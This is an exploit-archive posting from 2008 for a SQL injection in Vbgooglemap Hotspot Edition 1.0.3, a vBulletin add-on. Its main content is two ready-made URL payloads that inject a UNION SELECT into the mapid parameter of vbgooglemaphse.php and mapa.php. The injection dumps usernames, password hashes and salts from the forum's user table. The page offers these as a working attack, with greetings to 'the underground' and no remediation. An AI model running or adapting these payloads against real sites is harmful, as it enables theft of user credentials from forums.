[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
# Published : 2008-09-27
# Author : elusiven
# Previous Title : X7 Chat <= 2.0.1A1 (mini.php help_file) Local File Inclusion Vulnerability
# Next Title : Camera Life 2.6.2b4 Arbitrary File Upload Vulnerability


#######################################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
#
#######################################################################

# Bug discovered by elusiven
# It was priv8

Bug: 

[Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--

or:

[Target]/[Path]/mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--

# Special gr33tz for: my sweet Monia :*
# gr33tz for: artii2, GrZyB997, Sp!riT, Msb, Adish, Mandr4ke, eXc!t3, aqtyq, tescik2, stranger, Voldo, KrafT,
# DonJapkO, Gaara, br0wdz, uncalled, cOndemned aka f60.1, zbt, matisto, pr0metheus and all gd pplz from the underground.

#################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION
#
#################################################

# www.Syue.com [2008-09-27]